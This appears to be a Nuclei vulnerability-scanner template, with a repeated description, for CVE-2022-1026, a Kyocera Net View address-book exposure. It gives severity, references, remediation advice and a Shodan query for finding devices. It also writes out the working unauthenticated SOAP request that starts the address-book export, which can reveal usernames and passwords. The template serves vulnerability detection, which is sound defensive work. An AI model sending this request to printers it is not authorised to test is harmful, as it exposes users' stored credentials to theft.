Description
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
id: CVE-2022-1026
info:
name: Kyocera Net View Address Book Exposure
author: DhiyaneshDK
severity: high
description: |
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
impact: |
Unauthenticated attackers can export the address book from Kyocera printers containing sensitive user information including usernames and passwords without authentication.
remediation: |
Apply firmware updates provided by Kyocera or configure authentication for the address book export function.
reference:
- https://github.com/ac3lives/kyocera-cve-2022-1026
- https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2022-1026
cwe-id: CWE-522
epss-score: 0.14733
epss-percentile: 0.96496
cpe: cpe:2.3:a:kyocera:net_viewer:*:*:*:*:*:*:*:*
metadata:
vendor: kyocera
product: net_viewer
shodan-query: product:"Kyocera Printer Panel"
max-request: 1
tags: cve,cve2022,kyocera,exposure,vkev,intrusive,vuln
http:
- raw:
- |
POST /ws/km-wsdl/setting/address_book HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml
<?xml version="1.0" encoding="utf-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:create_personal_address_enumerationRequest><ns1:number>25</ns1:number></ns1:create_personal_address_enumerationRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SOAP-ENV:Envelope"
- "SOAP-ENV:Body"
condition: and
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a00473045022100b39ae7742d2c6737c42a9b6bfb53a31ac96a5252325b8e8f34434196cc7470190220550f5b11cc4ffb716814fdff9f50687a7d23a2b71d10b014ad3b3cfdb6dd2c95:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.